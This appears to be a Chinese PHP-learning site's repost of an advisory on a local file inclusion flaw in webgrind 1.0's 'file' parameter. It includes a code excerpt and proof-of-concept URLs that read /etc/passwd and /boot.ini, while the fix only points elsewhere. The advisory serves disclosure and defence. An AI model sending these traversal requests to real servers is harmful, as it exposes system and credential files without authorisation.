网站地图    收藏   

主页 > 后端 > 网站安全 >

webgrind 1.0 (file param)本地文件包含缺陷及修复 - 网

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题:webgrind 1.0 (file param) Local File Inclusion Vulnerability作者: Joakim Nygard and Jacob Oettinger开发者: http://code.google.com/p/webgrind影响版本: 1.0 (v1.02 in trunk on......

标题:webgrind 1.0 (file param) Local File Inclusion Vulnerability
作者: Joakim Nygard and Jacob Oettinger
开发者: http://code.google.com/p/webgrind
影响版本: 1.0 (v1.02 in trunk on github)
摘要:
Webgrind is an Xdebug profiling web frontend in PHP5.
Desc: webgrind suffers from a file inlcusion vulnerability (LFI)
when input passed thru the 'file' parameter to index.php is not
properly verified before being used to include files. This can be
exploited to include files from local resources with directory
traversal attacks and URL encoded NULL bytes.
----------------------------------------
/index.php:
-----------
122: case 'fileviewer':
123:     $file = get('file');
124:     $line = get('line');
----------------------------------------
测试平台: Microsoft Windows XP Professional SP3 (EN)
           Apache 2.2.21
           PHP 5.3.9
           MySQL 5.5.20
缺陷发现者: Michael Meyer
                            michael.meyer greenbone net

---
 http://www.2cto.com /webgrind/index.php?file=/etc/passwd&op=fileviewer
 http://www.2cto.com /webgrind/index.php?file=/boot.ini&op=fileviewer


修复:
请参考本站www.2cto.com前文

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论